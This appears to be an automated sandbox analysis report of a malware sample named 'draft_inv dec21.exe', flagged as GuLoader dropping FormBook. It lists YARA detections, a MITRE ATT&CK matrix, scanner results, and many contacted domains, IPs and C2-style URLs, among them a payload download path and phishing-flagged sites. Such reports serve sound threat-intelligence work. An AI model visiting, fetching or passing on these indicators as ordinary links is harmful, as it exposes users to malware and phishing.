Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp	Binary or memory string: !Program Manager~
Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.6832530982.0000000000F39000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.6733033915.0000000000F39000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.6784451344.0000000000F39000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.7062661256.0000000000F39000.00000004.00000020.sdmp	Binary or memory string: ProgmanS

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: draft_inv dec21.exe PID: 2748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection512	Virtualization/Sandbox Evasion22	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection512	LSASS Memory	Security Software Discovery421	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Information Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
draft_inv dec21.exe	26%	Virustotal		Browse
draft_inv dec21.exe	20%	Metadefender		Browse
draft_inv dec21.exe	18%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe	20%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe	18%	ReversingLabs	Win32.Trojan.GuLoader

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.2.svchost.exe.405796c.4.unpack	100%	Avira	TR/Dropper.Gen		Download File
11.2.svchost.exe.3418000.1.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Link
td-ccm-168-233.wixdns.net	0%	Virustotal	Browse
growebox.com	0%	Virustotal	Browse
www.lopsrental.lease	3%	Virustotal	Browse
dif-directory.xyz	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.fatima2021.com/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1	0%	Avira URL Cloud	safe
http://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c	100%	Avira URL Cloud	phishing
http://www.littlefishth.com/n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP	0%	Avira URL Cloud	safe
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin#	0%	Avira URL Cloud	safe
https://powerpoint.office.comEM8	0%	Avira URL Cloud	safe
http://www.growebox.com/n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr	0%	Avira URL Cloud	safe
www.ayudavida.com/n8ds/	0%	Avira URL Cloud	safe
http://www.writingmomsobitwithmom.com/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
https://statuswar.info/	0%	Avira URL Cloud	safe
http://schemas.microso	0%	Avira URL Cloud	safe
http://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr	0%	Avira URL Cloud	safe
http://www.receiptpor.xyz/n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr	100%	Avira URL Cloud	phishing
http://www.gdav130.xyz/n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14	0%	Avira URL Cloud	safe
http://www.dubaicars.online/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs	100%	Avira URL Cloud	phishing
https://excel.office.comv	0%	Avira URL Cloud	safe
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin	0%	Avira URL Cloud	safe
http://www.luxalbridi.com/n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr	0%	Avira URL Cloud	safe
http://www.quickcoreohio.com/n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN	0%	Avira URL Cloud	safe
http://www.heyvecino.com/n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p	0%	Avira URL Cloud	safe
http://www.gdav130.xyz/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14	0%	Avira URL Cloud	safe
http://www.lopsrental.lease/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4	0%	Avira URL Cloud	safe
https://statuswar.info/GHDFR/bin_rOlFDOAa61.binZ	0%	Avira URL Cloud	safe
http://www.mackthetruck.com/n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL	0%	Avira URL Cloud	safe
http://www.apps365.one/n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p	0%	Avira URL Cloud	safe
http://ocsp.digi	0%	Avira URL Cloud	safe
http://www.ozattaos.xyz/n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j	0%	Avira URL Cloud	safe
http://www.mariforum.com/n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr	0%	Avira URL Cloud	safe
http://www.dczhd.com/n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN	0%	Avira URL Cloud	safe
https://statuswar.info/GHDFR/bin_rOlFDOAa61.binO	0%	Avira URL Cloud	safe
http://www.dubaicars.online/n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN	100%	Avira URL Cloud	phishing
http://www.quickcoreohio.com/n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr	0%	Avira URL Cloud	safe
https://outlook.comUser6	0%	Avira URL Cloud	safe
https://statuswar.info/1	0%	Avira URL Cloud	safe
http://www.ayudavida.com/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4	0%	Avira URL Cloud	safe
http://www.apps365.one/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr	0%	Avira URL Cloud	safe
http://181ue.com/sq.html?entry=	0%	Avira URL Cloud	safe
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin9	0%	Avira URL Cloud	safe
http://www.effective.store/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR	0%	Avira URL Cloud	safe
http://www.inklusion.online/n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p	0%	Avira URL Cloud	safe
https://www.avto-click.com/n8ds/?gHl=36nvuDOhb	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com	34.237.47.210	true	false		high
td-ccm-168-233.wixdns.net	34.117.168.233	true	true	0%, Virustotal, Browse	unknown
growebox.com	81.2.194.128	true	true	0%, Virustotal, Browse	unknown
www.lopsrental.lease	66.29.140.185	true	true	3%, Virustotal, Browse	unknown
dif-directory.xyz	185.61.153.97	true	true	0%, Virustotal, Browse	unknown
www.mariforum.com	50.118.200.120	true	true		unknown
parkingpage.namecheap.com	198.54.117.217	true	false		high
www.inklusion.online	3.64.163.50	true	true		unknown
heyvecino.com	34.102.136.180	true	false		unknown
statuswar.info	162.241.120.147	true	true		unknown
www.mackthetruck.com	203.170.80.250	true	true		unknown
littlefishth.com	34.102.136.180	true	false		unknown
www.ayudavida.com	164.155.212.139	true	true		unknown
www.apps365.one	44.227.76.166	true	true		unknown
luxalbridi.com	34.102.136.180	true	false		unknown
www.writingmomsobitwithmom.com	216.250.120.206	true	true		unknown
www.ozattaos.xyz	104.21.82.227	true	true		unknown
www.avto-click.com	185.98.5.234	true	true		unknown
www.gdav130.xyz	35.244.144.199	true	false		unknown
dczhd.com	154.23.172.127	true	true		unknown
www.effective.store	199.59.242.153	true	true		unknown
www.dubaicars.online	185.68.16.57	true	true		unknown
www.receiptpor.xyz	unknown	unknown	true		unknown
www.3uwz9mpxk77g.biz	unknown	unknown	true		unknown
www.quickcoreohio.com	unknown	unknown	true		unknown
www.testwebsite0711.com	unknown	unknown	true		unknown
www.jobl.space	unknown	unknown	true		unknown
www.cmoigus.net	unknown	unknown	true		unknown
www.dczhd.com	unknown	unknown	true		unknown
www.talkingpoint.tours	unknown	unknown	true		unknown
www.fatima2021.com	unknown	unknown	true		unknown
www.littlefishth.com	unknown	unknown	true		unknown
www.recruitresumelibrary.com	unknown	unknown	true		unknown
www.abcjanitorialsolutions.com	unknown	unknown	true		unknown
www.growebox.com	unknown	unknown	true		unknown
www.braxtynmi.xyz	unknown	unknown	true		unknown
www.tvterradafarinha.com	unknown	unknown	true		unknown
www.yghdlhax.xyz	unknown	unknown	true		unknown
www.heyvecino.com	unknown	unknown	true		unknown
www.luxalbridi.com	unknown	unknown	true		unknown
www.photon4energy.com	unknown	unknown	true		unknown
www.csenmoga.com	unknown	unknown	true		unknown
www.dif-directory.xyz	unknown	unknown	true		unknown
www.smartam6.xyz	unknown	unknown	true		unknown
www.wordpresshostingblog.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.fatima2021.com/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1	true	Avira URL Cloud: safe	unknown
http://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c	true	Avira URL Cloud: phishing	unknown
http://www.littlefishth.com/n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP	false	Avira URL Cloud: safe	unknown
http://www.growebox.com/n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr	true	Avira URL Cloud: safe	unknown
www.ayudavida.com/n8ds/	true	Avira URL Cloud: safe	low
http://www.writingmomsobitwithmom.com/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK	true	Avira URL Cloud: safe	unknown
http://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr	true	Avira URL Cloud: safe	unknown
http://www.receiptpor.xyz/n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr	true	Avira URL Cloud: phishing	unknown
http://www.gdav130.xyz/n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14	false	Avira URL Cloud: safe	unknown
http://www.dubaicars.online/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs	true	Avira URL Cloud: phishing	unknown
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin	true	Avira URL Cloud: safe	unknown
http://www.luxalbridi.com/n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr	false	Avira URL Cloud: safe	unknown
http://www.quickcoreohio.com/n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN	true	Avira URL Cloud: safe	unknown
http://www.heyvecino.com/n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p	false	Avira URL Cloud: safe	unknown
http://www.gdav130.xyz/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14	false	Avira URL Cloud: safe	unknown
http://www.lopsrental.lease/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4	true	Avira URL Cloud: safe	unknown
http://www.mackthetruck.com/n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL	true	Avira URL Cloud: safe	unknown
http://www.apps365.one/n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p	true	Avira URL Cloud: safe	unknown
http://www.ozattaos.xyz/n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j	true	Avira URL Cloud: safe	unknown
http://www.mariforum.com/n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr	true	Avira URL Cloud: safe	unknown
http://www.dczhd.com/n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN	true	Avira URL Cloud: safe	unknown
http://www.dubaicars.online/n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN	true	Avira URL Cloud: phishing	unknown
http://www.quickcoreohio.com/n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr	true	Avira URL Cloud: safe	unknown
http://www.ayudavida.com/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4	true	Avira URL Cloud: safe	unknown
http://www.apps365.one/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr	true	Avira URL Cloud: safe	unknown
http://www.effective.store/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR	true	Avira URL Cloud: safe	unknown
http://www.inklusion.online/n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000000.6810627291.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6857788973.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6760638241.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7092262614.000000000DBDD000.00000004.00000001.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7077199847.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6844291725.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6745620416.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796095372.0000000009896000.00000004.00000001.sdmp	false		high
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin#	draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	false		high
https://powerpoint.office.comEM8	explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 0000000A.00000000.6850853985.000000000AAF0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6849380205.0000000009F70000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6736651526.00000000033E0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://statuswar.info/	draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://aka.ms/odirm	explorer.exe, 0000000A.00000000.6746304267.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6845108468.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796864976.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078024608.000000000993A000.00000004.00000001.sdmp	false		high
http://schemas.microso	UserOOBEBroker.exe, 00000003.00000002.11083878638.000002278EAB0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch/?ocid=iehp	explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp	false		high
https://excel.office.comv	explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://word.office.com	explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://statuswar.info/GHDFR/bin_rOlFDOAa61.binZ	draft_inv dec21.exe, 00000008.00000002.6919966464.0000000000828000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=	svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	false		high
http://ocsp.digi	explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
